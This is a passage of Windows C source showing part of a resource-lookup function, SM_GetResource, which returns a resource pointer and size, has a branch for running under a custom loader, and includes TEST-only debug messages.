      s = SizeofResource( NULL, Rh );
      if( ResourceSize != NULL ) *ResourceSize = s;

#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: will be returned for %d, %d: %08X, %d\r\n",
                  ResId, ResType, (DWORD) p, s );
        DbgOut();
        DbgDestroyOutput();
#     endif

      return (void*) p;
    }


    // we are operating under loader, get real base image address

    p = (BYTE*) ( *(((DWORD*) p) + 7) );

#   ifdef TEST
      wsprintf( DbgMsg, "SM_GetResource: real image base address 0x%08X\r\n", (DWORD) p );
      DbgOut();
      DbgDestroyOutput();
#   endif

    return GetResourcePtr( p, FALSE, ResType, ResId, ResourceSize );
  }
